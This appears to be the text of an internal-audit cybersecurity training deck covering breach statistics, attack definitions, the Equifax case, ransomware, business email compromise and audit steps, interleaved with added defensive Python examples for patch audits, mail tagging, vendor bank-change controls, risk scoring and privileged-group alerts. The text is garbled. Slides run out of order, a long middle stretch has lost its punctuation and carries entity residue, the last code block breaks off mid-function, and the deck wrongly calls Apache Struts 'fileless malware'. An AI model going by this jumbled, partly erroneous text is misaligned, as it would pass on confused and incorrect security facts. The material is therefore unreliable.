• Companies often fail to implement basic end user training around cybersecurity. Oftentimes the uneducated or untrained end user is the cyber attacker's first entry point into the company
• Determine whether your company conducts random phishing awareness training campaigns
• Evaluate your company's overall cybersecurity training awareness program
CYBERSECURITY – WHAT INTERNAL AUDIT CAN DO
Vulnerability Management
• Most companies fail to implement sound patch management processes and procedures:
  • 99% of exploited vulnerabilities were compromised more than a year after the patch was published
  • Companies do not know all of the information devices in their network and therefore are unable to adequately assess their patch management process
• Ensure your IT departments are scanning all assets continuously so that newly discovered vulnerabilities are identified quickly
• Validate that the patch management process is effective in ensuring all IT devices are properly updated (patched) to reflect the latest software update or release from the vendor. This includes workstations, servers, network equipment, VMware, Citrix, non-Microsoft software, etc.
• If known vulnerabilities cannot be patched due to business reasons, determine whether those risks are formally accepted and tracked by management. Assess whether there are sufficient mitigating controls in place
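The vulnerability management tests above, as an added example that is not from the presentation: an audit test run over a constructed device inventory that records each device's exposure, the date of its latest vendor patch level, and whether any unpatched state has a documented, management-accepted risk. Internet-facing devices are held to a shorter window than internal ones, and devices that are out of window are split into "accepted and tracked" exceptions and untracked gaps. The policy windows, the as-of date, the hostnames and the risk-acceptance reference are all constructed.

```python
"""Added example (not from the presentation): a patch-age audit test over a
constructed inventory. Policy windows, dates, hostnames and the acceptance
reference are constructed sample values."""
from datetime import date

# Constructed policy: maximum days since the latest applied vendor update.
MAX_AGE_DAYS = {"internet-facing": 30, "internal": 90}
AUDIT_DATE = date(2019, 3, 1)   # constructed "as of" date for the test

# Constructed inventory rows. accepted_risk holds a reference to a documented
# management risk acceptance, or None when there is no record.
INVENTORY = [
    {"host": "web-01", "exposure": "internet-facing",
     "last_patch": date(2019, 2, 20), "accepted_risk": None},
    {"host": "vpn-gw", "exposure": "internet-facing",
     "last_patch": date(2018, 11, 5), "accepted_risk": None},
    {"host": "erp-app", "exposure": "internal",
     "last_patch": date(2018, 6, 1),
     "accepted_risk": "RA-2018-07 (constructed): vendor EOL, compensating firewall rule"},
    {"host": "hr-db", "exposure": "internal",
     "last_patch": date(2019, 1, 15), "accepted_risk": None},
    {"host": "scada-hmi", "exposure": "internal",
     "last_patch": date(2017, 3, 1), "accepted_risk": None},
]


def patch_age_days(row: dict, as_of: date = AUDIT_DATE) -> int:
    """Days between the latest applied patch level and the audit date."""
    return (as_of - row["last_patch"]).days


def assess(inventory: list = INVENTORY, as_of: date = AUDIT_DATE) -> dict:
    """Sort each device into compliant, accepted (documented exception), or
    untracked (out of window with no risk acceptance on file)."""
    result = {"compliant": [], "accepted": [], "untracked": []}
    for row in inventory:
        age = patch_age_days(row, as_of)
        if age <= MAX_AGE_DAYS[row["exposure"]]:
            result["compliant"].append(row["host"])
        elif row["accepted_risk"]:
            result["accepted"].append(row["host"])
        else:
            result["untracked"].append((row["host"], age))
    return result


def findings(inventory: list = INVENTORY, as_of: date = AUDIT_DATE) -> list:
    """One audit finding line per untracked device, oldest patch level first."""
    untracked = sorted(assess(inventory, as_of)["untracked"], key=lambda x: -x[1])
    return [f"{host}: patch level {age} days old with no documented risk acceptance"
            for host, age in untracked]


if __name__ == "__main__":
    print(assess())
    for line in findings():
        print("FINDING -", line)
```

The "accepted" bucket is the point of the last bullet above: an unpatched device is not automatically a finding, but an unpatched device with no risk acceptance on file always is. Extending the row with the mitigating controls named in the acceptance would let the same test check the slide's final question as well.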
CYBERSECURITY – SUMMARY QUICK HIT LIST
REVIEW AT LEAST THE FOLLOWING FOR YOUR COMPANY
• Obtain a basic understanding of your critical information assets, where they are stored and how they are protected
• Perform an inventory of IT devices and assess each device's risk relating to patches
• Understand your company's fundamental process around patch management and focus on higher risk areas such as internet-facing devices and software with known vulnerabilities (Adobe, Java, browsers, operating systems)
• Perform an inventory of all user and admin IDs. Understand the access each ID has in your environment and why that access level is necessary. Assess whether password levels and parameters are adequate (password length, characters and change interval)
• Implement a continual end user training program
• Ensure backups and recovery plans work as intended and are properly segregated
• Understand the coverage and terms of your company's cyber insurance policy
• Assess the requirement for multi-factor authentication
ANATOMY OF AN ATTACK

QUESTIONS
David Losacco, Principal
mobile (918) 625-8870
davidlosacco@stinnett-associates.com
Stinnett & Associates
stinnett-associates.com
Dallas | Denver | Houston | Oklahoma City | San Antonio | Tulsa
bull Why should we be concerned with cybersecurity
bull What are some key cybersecurity definitions
bull What are some emerging cybersecurity trends and threats
bull What happened with some recent high-profile cybersecurity attacks
bull What are some cybersecurity roadblocks
bull What steps can Internal Audit take to evaluate your companyrsquos cybersecurity risk level
bull What can a Non-Technical Auditor do to evaluate your companyrsquos cybersecurity health
LEARNING OBJECTIVES
3
4
INTRODUCTION TO A CYBER CRIMINAL
5
WHAT DO ALL THESE COMPANIES HAVE IN COMMON
6
hellip AND THESE
7
List of Recent headlines
8
AS AUDITORS WHY DO WE CARE
Sources 2018 Global Megatrends in Cybersecurity
bull 51 of data breaches are caused by Organized Cyber Crime 18 are caused by Nation-States
bull 70 of cyber attacks and data breaches go undetected
bull 69 of organizations learn of their breach from an outside entity such as law enforcement customers or suppliers
bull In 2017 there were over 130 large-scale targeted breaches in the US per year and that number is growing by 27 percent per year
bull Small and mid-size businesses make up 43 of cyber crime targets
bull Cyber Crime costs estimated to reach $6 Trillion by 2021
bull 77 of organizations do not have a formal Cybersecurity Incident Response Plan
bull 147900000 consumer records impacted by Equifax breach in 2017 US Population is 327 Million
bull In 1st Quarter of 2017 60 of malware payloads were ransomware By the end of 2018 ransomwareaccounted for only 5 of malware
bull ldquoFilelessrdquo malware attacks increased 432 in 2017
bull Cyrptojacking attacks increased 8500 in 2017
Security compromises are a persistent business risk
9
THEY WANT OUR MONEY
Financial Gain is still the 1 factor for cyber attacks and breaches at over 75 in 2017 Espionage and other factors combined still make up less than 25
bull Personally Identifiable Information (PII) is worth more on the black market (ldquoThe Dark Webrdquo) than Credit Card Numbers
bull Ransomware payments estimated over $1 billion in 2017 70 of all Ransomware was paid
bull Email scams cost businesses over $12 Billion in 2018
bull 10 of laundered money is attributable to cyber crime That number is $200 Billion
Source Verizon Data Breach Investigations Report 2018
10
HOW DO THEY DO IT
Cyber criminals have multiple means to achieve Financial Gain
bull Theft of funds (Bank Accounts)
bull Extortion (Ransomware)
bull Selling of stolen credit cards
bull Selling of PII and PHI data
bull Insider Trading Information
bull Using compromised environment for other attacks or for rent (Cryptojacking)
11
EVERCHANGING LANDSCAPE
The types of cyber attacks and exploits are changing
bull Server Attacks once at 50 are trending down
bull User Device and Person attacks are both trending upward at nearly same pace due to Malware Ransomware and Phishing attacks
COMMON TERMS AND DEFINITIONSInformation Technology (IT) ndash The corporate department that handles the corporate software and hardware that runs the normal functions of a typical business or enterprise The department within a company that is charged with establishing monitoring and maintaining information technology systems and services
Operational Technology (OT) ndash The hardware and software that detects or causes a change through the direct monitoring andor control of physical devices processes and events in the enterprise OT technology and departments are usually found within manufacturing and industrial environments and include Industrial Control Systems (ICS) such as Supervisory Control and Data Acquisition systems (SCADA) OT devices and environments are typically run separately from IT departments These are the devices that communicate with pipelines and electrical grids (and nuclear power plants)
Internet of Things ndash A computing concept that describes the idea of everyday physical devices (DVR systems thermostats refrigerators vehicles) being connected to the internet and being able to identify themselves to other devices which enable the devices to collect and exchange data
12
13
ATTACKS IN THE HEADLINES
httpswwwbusinessinsidercomhackers-stole-a-casinos-database-through-a-thermometer-in-the-lobby-fish-tank-2018-4
httpsjsiswashingtonedunewscyberattack-critical-infrastructure-russia-ukrainian-power-grid-attacks
14
COMMON TERMS AND DEFINITIONSBot ndash A bot is a software ldquorobotrdquo that performs an extensive set of automated tasks on its own Bots can perform an extensive set of destructive tasks as well as introduce many forms of malware to your system or network They can also be used by black hats to coordinate attacks by controlling botnets
Botnet ndash A number of Internet-connected devices (eg computers DVR systems and other devices) after being infected with malware each of which is running one or more bots Botnets can be used to perform Distributed Denial Of Service Attack steal data send spam and allow the attacker access to the device and its connection Botnets can be rented out to other hackers or cyber criminals
Denial of Service(DOS) and Distributed Denial of Service ndash A type of attack on a network that is designed to bring the network to its knees by flooding it with useless traffic A Distributed DOS is the same as a DOS attack but involves multiple computers attacking the network from multiple locations Typically the computers being used are infected with Botnet
15
ATTACKS IN THE HEADLINES
httpswwwcsoonlinecomarticle3258748the-mirai-botnet-explained-how-teen-scammers-and-cctv-cameras-almost-brought-down-the-internethtml
httpswwwwiredcomstoryreaper-iot-botnet-infected-million-networks
16
COMMON TERMS AND DEFINITIONSMiddleware ndash Software that facilitates exchange of data between two application programs within the same environment or across different hardware and network environments Three basic types of middleware are (1) communication middleware (2) database middleware and (3) system middleware
Man-in-the-Middle (MITM) Attacks ndash An attack occurrence where the attacker has been able to place themselves in the middle of communications between two parties The Attacker is able to alter or obtain data for themselves while unknown to the other two parties
SQL Injection and Cross-site scripting Attacks ndash An attack occurrence where the attacker injects malicious code into a website In SQL Injection the attacker uses SQL language to obtain information back from the website that was unintended In Cross-site scripting the attacker injects code that only impacts other users of website
17
ATTACKS IN THE HEADLINES
httpswwwzdnetcomarticleman-in-the-middle-flaw-left-smartphone-banking-apps-vulnerable
httpskrebsonsecuritycom201809secret-service-warns-of-surge-in-atm-wiretapping-attackscomment-page-1httpswwwscmagazinecomhomesecurity-newscisco-patches-prime-license-
manager-sql-injection-vulnerability
httpswwwtechrepubliccomarticlebritish-airways-data-theft-demonstrates-need-for-cross-site-scripting-restrictions
18
COMMON TERMS AND DEFINITIONSCommon Vulnerability and Exposures (CVE) ndash Catalog sponsored by Homeland Security that documents known Cyber threats Vulnerabilities are known errors in a system or software that provides an attacker with direct access Exposures are known errors that allow an attacked indirect access which may allow the attacker to gather knowledge or content Many of the malwares and cyber attacks in the news resulted from attackers utilizing a vulnerability that had been known and fixed by the vendor for several months or years but not fixed at the company level
Zero Day VulnerabilityAttack ndash An unknown or newly discovered vulnerability that has not yet been fixed by the software or system provider Zero day vulnerabilities are the most difficult to protect against and detect due to the lack of knowledge and support by vendor
Advanced Persistent Threat ndash A set of stealthy and continuous computer hacking processes often orchestrated by a person or persons targeting a specific entity
19
Malware is short for malicious software Malware is a broad term that encompasses computer viruses worms Trojan horses spyware adware and Ransomware Malware is designed to interfere with normal computer operation usually giving hackers a chance to gain access to your computer and collect sensitive personal information
MALWARE
bull Malware is seen as first access point used in connection with Hacking attempts
bull Ransomware is a version of Malware that has been in the headlines
bull Malware can grant command and control of a device to the hackers
bull 1 in 131 emails contained Malware in 2016
bull ldquoFilelessrdquo Malware is a new variant that is more difficult to detect
20
bull Attack started early March 2017 with hackers using a Bot programmed to search the web for a recently
released CVE (Common Vulnerability and Exposure)
bull Took the hackers two months before they found the vulnerability on one of Equifaxrsquos websites used to help
customers with claims
COMPLEXITY BEHIND THE EQUIFAX ATTACK
bull Hackers then used another vulnerability (a Fileless Malware
named Apache Struts) that was also a CVE that had been
issued a month before but never fixed
bull Hackers spent an estimated 76 days in the network and
downloaded records from 51 different databases
bull Over 148 million records were stolen
bull Attack was not identified until July 30 2017
21
EQUIFAX – WHAT WAS LOST
In addition to US consumers, the UK Data Protection Authority (the Information Commissioner’s Office) reported:
• Approximately 20,000 UK data subjects had names, dates of birth, telephone numbers and driving license numbers exposed
• More than 600,000 UK data subjects had names, dates of birth and telephone numbers exposed
• Up to 15 million UK data subjects had names and dates of birth exposed
COMMON TERMS AND DEFINITIONS
Dark Web / Darknet – Websites located on the internet that are not accessible by normal search engines or means. Darknet sites require special software such as TOR (The Onion Router) that helps keep users anonymous. Darknet sites are used for several illegal activities, such as black-market purchasing of stolen PII or credit card data as well as botnet rentals. Bitcoins are traded on the Dark Web.
Bitcoin – A digital currency created in 2009. There are no physical bitcoins, only balances kept on a public ledger in the cloud that – along with all Bitcoin transactions – is verified by a massive amount of computing power. Bitcoin mining is the process through which bitcoins are released into circulation; it involves solving a computationally difficult puzzle to discover a new block, which is added to the blockchain, and receiving a reward in the form of a few bitcoins. As more and more bitcoins are created, the difficulty of the mining process – that is, the amount of computing power involved – increases.
RANSOMWARE
A type of malware that prevents or limits users from accessing their system, either by locking the system’s screen or by locking the users’ files, unless a ransom is paid. Ransomware typically encrypts certain file types on infected systems and forces users to pay the ransom through certain online payment methods to get a decryption key.
• The use of bitcoins is typically the payment method
• Ransomware attacks were growing at a rate of 350% annually until 2017 and have now dropped, but are still present (HR and healthcare companies, both in February)
• The WannaCry ransomware attack impacted over 200,000 people across 150 countries (it included a worm)

RANSOMWARE
Ransomware-as-a-Service (RaaS) allows any amateur attacker to get into the business with basic knowledge and less effort. The amateur attacker can visit a RaaS site on the dark web and set up an account to create the ransomware package. It is up to the attacker to distribute the ransomware, while the RaaS will handle the ransom payments. The RaaS developer takes a cut of any payments that are made. The developer will also reduce their cut depending on the volume of payments received.
BUSINESS EMAIL COMPROMISE (BEC)
• Business Email Compromise (BEC) is an exploit targeting a company’s corporate email accounts and impersonating or “spoofing” the email identity of an employee or company executive in order to fraudulently obtain money or sensitive information from the company, its business partners and/or employees
• The FBI’s Internet Crime Complaint Center (IC3) said that, based on fraud reports submitted from October 2013 to May 2018, there were 41,058 total US victims of BEC schemes, which collectively lost at least $2.9 billion, while global losses were more than four times that amount (FBI: Global Business Email Compromise Losses Hit $12.5 Billion)
• BEC exploits have become so concerning that the SEC issued a Report of Investigation in October 2018 (https://www.sec.gov/litigation/investreport/34-84429.pdf). The report was considered a “highly unusual action” by the SEC and identified nine companies that had been specifically investigated by the SEC due to a BEC incident
• All nine lost at least $1 million due to the BEC scam
• Two companies lost more than $30 million each
• In total the nine issuers lost almost $100 million
BEC & PHISHING
Phishing – A form of social engineering in which a message, typically an email with a malicious attachment or link, is sent to a victim with the intent of tricking the recipient into opening the attachment.
Spear Phishing – Phishing attacks directed at a specific individual or company. Sub-categories of spear phishing include Cloning (using a previous legitimate email) and Whaling (attacking a high-level executive).
• CEO email to Treasurer
• HR phishing for employee data
• W-2 phishing (the IRS sent out a warning)
The majority of phishing cases are used as a means to install malware onto a host environment.
PHISHING EMAIL EXAMPLE
Most companies battle the increase in phishing and spear-phishing attacks by labeling each external email with some form of the following inserts:
This “band-aid” is still widely in practice today, however
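The external-mail label described above is normally applied at the mail gateway. The following Python is an added example, not code from the presentation or from any product it names: it tags inbound mail from outside the organisation and also records two signals the label alone does not surface, an executive’s display name sitting on an outside address and a Reply-To that diverts replies to a different domain. The internal domain, the protected executive names and both sample messages are constructed for the example.

```python
import email
from email import policy
from email.utils import parseaddr

# Organisation settings, constructed for this example.
INTERNAL_DOMAINS = {"example.com"}
# Executives whose names are commonly borrowed in BEC lures (constructed list).
PROTECTED_NAMES = {"jane doe", "john roe"}
EXTERNAL_TAG = "[EXTERNAL]"
BANNER = ("CAUTION: This email originated from outside the organisation.\n"
          "Do not click links or open attachments unless you recognise the sender.")


def sender_domain(addr: str) -> str:
    """Lower-cased domain part of an address ('' if there is none)."""
    return addr.rpartition("@")[2].lower()


def classify_sender(raw_message: str) -> dict:
    """The checks an inbound gateway would record for one message."""
    msg = email.message_from_string(raw_message, policy=policy.default)
    display_name, addr = parseaddr(msg.get("From", ""))
    _, reply_addr = parseaddr(msg.get("Reply-To", ""))
    external = sender_domain(addr) not in INTERNAL_DOMAINS
    # An executive's display name on an address outside the company.
    impersonation = external and display_name.strip().lower() in PROTECTED_NAMES
    # A Reply-To on another domain silently moves the reply thread elsewhere.
    reply_mismatch = bool(reply_addr) and sender_domain(reply_addr) != sender_domain(addr)
    return {
        "from": addr,
        "external": external,
        "display_name_impersonation": impersonation,
        "reply_to_mismatch": reply_mismatch,
    }


def tag_message(raw_message: str) -> str:
    """Prepend the external tag to the subject and a banner to a plain-text body.

    Internal mail is returned unchanged; multipart messages only get the subject tag.
    """
    if not classify_sender(raw_message)["external"]:
        return raw_message
    msg = email.message_from_string(raw_message, policy=policy.default)
    subject = msg.get("Subject", "")
    if not subject.startswith(EXTERNAL_TAG):
        tagged = f"{EXTERNAL_TAG} {subject}".strip()
        if "Subject" in msg:
            msg.replace_header("Subject", tagged)
        else:
            msg["Subject"] = tagged
    if not msg.is_multipart() and msg.get_content_type() == "text/plain":
        msg.set_content(BANNER + "\n\n" + msg.get_content())
    return msg.as_string()


# Constructed sample messages (not real mail).
SAMPLE_BEC = """\
From: "Jane Doe" <jane.doe.ceo@webmail.example>
To: treasurer@example.com
Reply-To: jane.doe.ceo@webmail.example
Subject: Urgent wire
Content-Type: text/plain; charset="utf-8"

Please send the wire today and keep this between us.
"""

SAMPLE_INTERNAL = """\
From: "Bob Builder" <bob@example.com>
To: treasurer@example.com
Subject: Lunch
Content-Type: text/plain; charset="utf-8"

Noon?
"""
```

The subject tag is what users see; the two extra flags are what a mail gateway or SIEM rule should alert on, since a banner on its own is the “band-aid” the slide refers to.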
BEC & OFFICE 365
• Office 365 is Microsoft’s cloud-based solution, offering everything from email and Excel to cloud storage
• Microsoft Office 365 is now in use at over 70% of Fortune 500 companies
• 20% of all companies use Office 365
• Office 365 overtook Office products in the 4th quarter of 2017 as the largest revenue stream for Microsoft
• Most companies do not correctly set up Office 365 security or logging
• Significant increase in attack vectors against Office 365
• It only takes one employee and the hacker is internal to email and Office 365
• Some attack vectors do not require a phishing email
BEC ATTACK WALKTHROUGH
BEC – PROTECT YOUR CASH
Accounting controls at all entry/exit points for cash
Cash Receipts
• Review of balances over 60 days and $10k – a triggered review and communication uncovered a change in bank info (communication was being sent to a deleted email)
• Reports that generate overdue receivables timely for follow-up
• Escalation rules for overdue receivables
Cash Disbursements
• SOD – limit access to the vendor master file
• Controls related to changing bank info for all vendors – need more than email communication; personal verification with the vendor requesting the change
• Vendor set-up – verification of information provided
• ISNetworld – vetting process for vendors; could require vetting prior to set-up as vendors
• ACH debits – no reason to give debit access to the account; if done, dual approval and a ZBA should be used
• Multi-factor authentication
Other Processes to Consider
• Treasury
• Payroll
• Royalties
• SOX Impact
• Cyber Insurance
• Legal Liabilities
• Contract Language
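The disbursement controls listed above (call-back verification to the number already on file, dual approval, segregation of duties) can be enforced inside the vendor master change workflow rather than left to memory. The following Python is an added example, not the presenter’s code or any ERP vendor’s: a bank-change request is applied only when every control passes, and every decision is written to an audit log. The vendor record, the approver list and the requests are constructed.

```python
from dataclasses import dataclass, field
from typing import List, Optional

# Constructed for this example: who may approve a vendor master change.
AUTHORIZED_APPROVERS = {"ap.manager", "controller", "treasurer"}


@dataclass
class Vendor:
    vendor_id: str
    name: str
    phone_on_file: str   # captured at vetted vendor set-up, never taken from a later email
    bank_account: str


@dataclass
class BankChangeRequest:
    vendor_id: str
    new_bank_account: str
    received_via: str                      # "email", "letter", "portal"
    entered_by: str                        # AP clerk who keyed the request
    callback_number: Optional[str] = None  # number actually dialled to confirm the change
    callback_by: Optional[str] = None      # who made the call
    approvals: List[str] = field(default_factory=list)


def validate_bank_change(vendor: Vendor, req: BankChangeRequest) -> List[str]:
    """Return every control failure; an empty list means the change may proceed."""
    problems = []
    if req.vendor_id != vendor.vendor_id:
        problems.append("request does not match vendor record")
    # Email alone is never sufficient evidence for a bank change.
    if req.callback_number is None:
        problems.append("no call-back verification performed")
    elif req.callback_number != vendor.phone_on_file:
        problems.append("call-back used a number not on file (possibly supplied by the requester)")
    if req.callback_by is not None and req.callback_by == req.entered_by:
        problems.append("call-back must be made by someone other than the preparer")
    approvers = set(req.approvals)
    if len(approvers) < 2:
        problems.append("dual approval required")
    if req.entered_by in approvers:
        problems.append("preparer cannot approve own change (segregation of duties)")
    if not approvers <= AUTHORIZED_APPROVERS:
        problems.append("approver lacks authority for vendor master changes")
    return problems


def apply_bank_change(vendor: Vendor, req: BankChangeRequest, audit_log: List[dict]) -> bool:
    """Apply the change only when every control passes; log the outcome either way."""
    problems = validate_bank_change(vendor, req)
    entry = {"vendor_id": vendor.vendor_id, "received_via": req.received_via,
             "entered_by": req.entered_by, "approvals": sorted(req.approvals)}
    if problems:
        audit_log.append({**entry, "status": "rejected", "reasons": problems})
        return False
    audit_log.append({**entry, "status": "applied",
                      "old_account": vendor.bank_account, "new_account": req.new_bank_account})
    vendor.bank_account = req.new_bank_account
    return True
```

The rejected entries in the audit log are themselves an audit artefact: a run of rejections for the same vendor, each quoting a call-back number that is not on file, is exactly the pattern a BEC attempt leaves behind.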
AND MULTI-FACTOR AUTHENTICATION
• Google has not had any of its 85,000+ employees successfully phished on their work-related accounts since early 2017, when it began requiring all employees to use physical security keys in place of passwords and one-time codes
• Office 365 and other cloud-based services should all use multi-factor authentication
BARRIERS TO EFFECTIVE CYBERSECURITY
Many companies do not know where to start with cybersecurity, how to evaluate what is enough, or how to recover when their best efforts still result in a cyber breach.
The main reasons for companies’ struggles are:
• Lack of skilled resources (people and time)
• Lack of funds
• Continued innovations in technology
• Expansion of the attack surface
• Lack of understanding of the company’s information assets and their value
• Failure to properly understand threats and risks
• Failure to implement core security protocols and procedures
DEFENSE IN-DEPTH APPROACH
A Defense-in-Depth approach to cybersecurity is a layered approach that recognizes a company’s first line of defense may fail and integrates multiple layers of defense around a company’s information assets. Also called the Castle Approach (once you breach the walls, more defenses are in place).
• Patch Management
• Network Vulnerability Scanning
• Internal & External Network Boundaries
• Firewall Implementation and Monitoring (including NextGen)
• Firewall Dataflow & Standards Documentation
• Security Incident Management
• Evaluation of Encryption Technologies
• Workstation Endpoint Protection
• Operating System EOL
• Security Staffing
• Wireless Security
• IPS / IDS / SIEM Implementations
• Cloud Service Provider Evaluations
• Physical Security
• Network Access Control

CYBERSECURITY DEFENSE IN-DEPTH
People / Technology / Processes
THE PEOPLE CHALLENGE – Humans remain one of the weakest links in the security chain. Ensure you have a strong security awareness training program.
THE TECHNOLOGY CHALLENGE – The increasing sophistication and rate of attacks means that constant upkeep and tracking of technology changes is essential.
THE PROCESS CHALLENGE – Ensure best-practice processes and associated management frameworks are in place. Regular audits and reviews are important.
WHERE AUDIT CAN HELP
Step 1 – Identify risks through a formal risk assessment of assets
Step 2 – Perform a baseline gap analysis of the current control environment against industry-standard frameworks and identify controls which need to be implemented to reduce the risk of cybersecurity incidents affecting critical data assets
Step 3 – Make recommendations on the implementation and ongoing management of cybersecurity controls
Step 4 – Follow-up reviews to monitor control implementation progress
Repeat
Cycle: Risk Assessments → Create a Baseline / Gap Analysis → Implement and Manage Controls → Assess & Report
STEP 1 – CYBERSECURITY RISK ASSESSMENT
• Perform risk assessments to understand the organizational risk and where high-risk assets exist
• The risk assessment should include interviews of departments outside of IT to ensure all critical data asset types are identified
• Work with IT to classify each of the asset types to assist in measuring the overall risk of a cybersecurity event
• Consider using a threat modeling tool to semi-qualitatively measure cybersecurity risks, in order to identify, estimate and prioritize information security risks
Identification of Assets → Asset Locations → Classification of Assets → Threat Modeling → Calculated Risk Results

STEP 1 – CYBERSECURITY RISK ASSESSMENT
Key to an effective cybersecurity program is to understand the Company’s information assets:
• What value do the assets have?
• Credit card data
• Employee or customer records
• Bank accounts
• Intellectual property
• Trade secrets
• Insider knowledge
• Data location
• Cash-in / cash-out processes
• Who would want the data?
STEP 1 – CYBERSECURITY RISK ASSESSMENT
• Through formal risk assessments with all critical functions in the business, identify where data lives and how the data should be classified, then perform a threat analysis to semi-qualitatively determine the risk of a particular cybersecurity incident occurring. This allows you to determine the critical data assets in your environment that are most at risk of a cybersecurity incident
• Use this data to evaluate and identify the cybersecurity framework controls to put in place for your business
[Example screenshot of a critical data asset risk assessment]
STEP 2 – BASELINE GAP ANALYSIS
• Perform walkthroughs with the information technology department to understand the cybersecurity controls in place
• Evaluate control design as it relates to commonly accepted framework(s)
• Identify control gaps and create a baseline for cybersecurity maturity in the organization
• Use the cybersecurity maturity baseline and risk assessment results to identify and prioritize controls to implement, including the highest-priority, most impactful controls that should be implemented first
STEP 3 – CONTROLS ANALYSIS
• The baseline gap analysis facilitates the identification of controls which will most reduce the risk of cybersecurity threats to the greatest number of critical data assets (as identified during the risk assessment)
• Work with IT management to identify realistic and feasible mitigating controls and an implementation roadmap
[Chart: MITIGATING CONTROL COUNTS]
A) Identify information systems with a calculated cybersecurity risk > 100
B) Does the information system have a SPECIFIC THREAT with cybersecurity risk over 100 (Yes/No)? If yes, move to the next step
C) Identify mitigating controls to implement to mitigate the threat
D) Total all instances where controls reduced risk
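Steps A to D above, together with the semi-qualitative risk scoring from Step 1, carried through on a constructed inventory. This Python is an added example and not the presenter’s threat modeling tool or its spreadsheet: the 1 to 10 rating scales, the product formula (asset value × likelihood × vulnerability) and the choice to rate a system by its highest single threat are assumptions made for the example; the > 100 cut-off is the one used in the slide.

```python
from collections import Counter
from typing import Dict, List, Tuple

# Cut-off used in steps A and B of the slide.
RISK_THRESHOLD = 100

# Constructed inventory. Scoring scale is an assumption for this example: asset
# value, threat likelihood and vulnerability are each rated 1-10, so a threat's
# risk = value x likelihood x vulnerability (maximum 1000).
SYSTEMS = {
    "Payroll": {
        "asset_value": 9,
        "threats": {
            "Ransomware": {"likelihood": 6, "vulnerability": 7,
                           "controls": ["Patch management", "Offline backups", "Endpoint protection"]},
            "BEC / wire fraud": {"likelihood": 5, "vulnerability": 3,
                                 "controls": ["Multi-factor authentication", "Dual approval"]},
        },
    },
    "Customer database": {
        "asset_value": 10,
        "threats": {
            "SQL injection": {"likelihood": 4, "vulnerability": 5,
                              "controls": ["Patch management", "Web application firewall", "Vulnerability scanning"]},
            "Insider misuse": {"likelihood": 2, "vulnerability": 4,
                               "controls": ["Least privilege", "Log monitoring"]},
        },
    },
    "Marketing website": {
        "asset_value": 3,
        "threats": {
            "Defacement": {"likelihood": 5, "vulnerability": 4, "controls": ["Patch management"]},
            "DDoS": {"likelihood": 6, "vulnerability": 5, "controls": ["DDoS protection service"]},
        },
    },
}


def threat_risk(asset_value: int, threat: dict) -> int:
    """Semi-qualitative risk of one threat against one system."""
    return asset_value * threat["likelihood"] * threat["vulnerability"]


def system_risk(system: dict) -> int:
    """Overall system risk: its highest single-threat risk (assumption for this example)."""
    return max(threat_risk(system["asset_value"], t) for t in system["threats"].values())


def mitigating_control_counts(systems=SYSTEMS, threshold=RISK_THRESHOLD):
    """Steps A-D from the slide: (flagged threats per system, instances per control)."""
    flagged: Dict[str, List[str]] = {}
    counts: Counter = Counter()
    for name, system in systems.items():
        if system_risk(system) <= threshold:      # A: only systems over the threshold
            continue
        for threat_name, threat in system["threats"].items():
            if threat_risk(system["asset_value"], threat) <= threshold:  # B: specific threat
                continue
            flagged.setdefault(name, []).append(threat_name)
            counts.update(threat["controls"])      # C/D: one instance per threat a control mitigates
    return flagged, counts


def prioritised_controls(counts: Counter) -> List[Tuple[str, int]]:
    """Controls ordered by how many flagged threats they reduce (ties alphabetical)."""
    return sorted(counts.items(), key=lambda kv: (-kv[1], kv[0]))
```

On this inventory the marketing website drops out at step A, the insider-misuse threat drops out at step B, and patch management comes out on top because it reduces risk for two flagged threats, which is the kind of bar the slide’s chart shows.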
STEP 4 – CYBERSECURITY REPORTING
• Leverage information gained during the project to provide management with a detailed mapping of the organization’s cybersecurity position
• Consider using the COBIT Process Capability Model to map out the CSC framework, which will allow management to begin tracking cybersecurity maturity
5 = OPTIMIZED
4 = PREDICTABLE
3 = ESTABLISHED
2 = MANAGED
1 = PERFORMED
CYBERSECURITY FRAMEWORKS AND GUIDANCE
NIST
• NIST SP 800-53 r5, Recommended Security Controls for Federal Information Systems and Organizations
• NIST Cyber Security Framework v1.1
• Various other NIST special publications
Center for Internet Security
• Critical Security Controls (formerly the SANS Top 20)
International Organization for Standardization
• ISO 27001 family – Information security management systems
ISACA
• Implementing the NIST Cybersecurity Framework Using COBIT 5
Does company size matter? Companies with more than 10,000 employees are slightly more likely to have adopted a security framework (90%), but even smaller companies with fewer than 1,000 employees report significant rates of adoption (77%) – Source: itgovernanceusa.com
According to Tenable’s Trends in Security Framework Adoption Survey, 84% of organizations in the US leverage a security framework in their organization and 44% use more than one framework – Source: itgovernanceusa.com
CENTER FOR INTERNET SECURITY – CRITICAL SECURITY CONTROLS
CYBERSECURITY – WHAT INTERNAL AUDIT CAN DO
User and Administrator Level Access
• Companies fail to adequately assess user access levels to ensure that the principle of least privilege is applied throughout IT systems. Don’t just think SOX
• Confirm IT is not using privileged accounts for daily tasks, which can include browsing the internet or answering email
• Determine whether privileged and admin account passwords are held to a higher standard than normal accounts (complexity, length, change frequency, sharing)
• Consider how IT monitors and is alerted on changes to elevated privileges
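One way to monitor and alert on changes to elevated privileges, as an added example that is not part of the presentation. The Python below reads a simplified key=value export of Windows Security events (a constructed format, not the native event text; the usernames and timestamps are made up) and raises an alert for every addition to a watched group, escalating when an account grants the privilege to itself. The event IDs 4728, 4732 and 4756 are the real Windows IDs for a member being added to a security-enabled global, local or universal group.

```python
import re
from typing import Dict, List, Optional

# Groups whose membership changes should always raise an alert (adjust per environment).
PRIVILEGED_GROUPS = {"Domain Admins", "Enterprise Admins", "Schema Admins", "Administrators"}

# Windows Security event IDs for "a member was added to a security-enabled group":
# 4728 = global group, 4732 = local group, 4756 = universal group.
GROUP_ADD_EVENTS = {"4728": "global", "4732": "local", "4756": "universal"}

# Constructed sample log in a simplified key=value export format (not the native
# Windows event text); usernames and timestamps are made up.
SAMPLE_LOG = """\
2018-10-02T14:03:11Z event=4728 subject=jsmith member=svc_backup group="Domain Admins"
2018-10-02T14:05:40Z event=4624 subject=jsmith logon_type=2
2018-10-02T16:22:05Z event=4732 subject=helpdesk01 member=helpdesk01 group="Administrators"
2018-10-03T09:10:00Z event=4728 subject=hr.admin member=newhire group="HR Staff"
2018-10-03T09:12:00Z event=4756 subject=svc_backup member=contractor7 group="Enterprise Admins"
"""

LINE_RE = re.compile(r"^(?P<ts>\S+)\s+event=(?P<event>\d+)\s*(?P<rest>.*)$")
KV_RE = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')


def parse_line(line: str) -> Optional[Dict[str, str]]:
    """Parse one export line into a dict; None for lines that do not match the format."""
    m = LINE_RE.match(line)
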